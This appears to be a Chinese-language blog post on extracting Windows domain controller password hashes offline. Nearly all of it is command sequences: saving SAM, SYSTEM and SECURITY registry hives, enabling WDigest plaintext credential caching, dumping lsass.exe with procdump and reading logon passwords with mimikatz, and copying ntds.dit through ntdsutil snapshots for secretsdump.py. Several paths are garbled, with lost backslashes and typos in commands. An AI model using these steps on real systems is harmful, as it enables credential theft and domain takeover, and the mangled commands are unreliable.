zoukankan      html  css  js  c++  java
  • 离线提取域控HASH的方法

    1、注册表提取


    提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。

    reg save hklmsam sam.hive
    reg save hklmsystem system.hive
    reg save hklmsecurity secruity.hive
    

    本地获取

    #如果要提取明文,请修改注册表
    reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1
    #破解hash
    python ./secretsdump.py -sam ~/Desktop/sam.hive  -security ~/Desktop/security.hive -system ~/Desktop/system.hive  LOCAL
    

    2、lsass.exe提取


    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    mimikatz#privilege::debug
    mimikatz#sekurlsa::minidump lsass.dmp
    mimikatz#sekrulsa::logonpasswords full  
    

    3、ntds.dit提取


    ntdsutil snapshot "activate instance ntds" create quit quit
    ntdsutil snapshot "mount {GUID}" quit quit
    copy MOUNT_POINTwindows
    tds
    tds.dit c:	emp
    tds.dit
    ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit
    


    python ./secretsdump.py -ntds ~/Desktop/ntds.dit -system ~/Desktop/system.hiv  LOCAL
    

  • 相关阅读:
    发布自己的包到Nuget上
    asp.net core 中的MD5加密
    asp.net core csrf
    KNN算法
    ios测试apk
    python多进程
    机顶盒 gettimeofday()获取毫秒溢出
    Kiggle:Digit Recognizer
    Kaggle:Titanic: Machine Learning from Disaster
    Python抓取微博评论
  • 原文地址:https://www.cnblogs.com/mutudou/p/13036243.html
Copyright © 2011-2022 走看看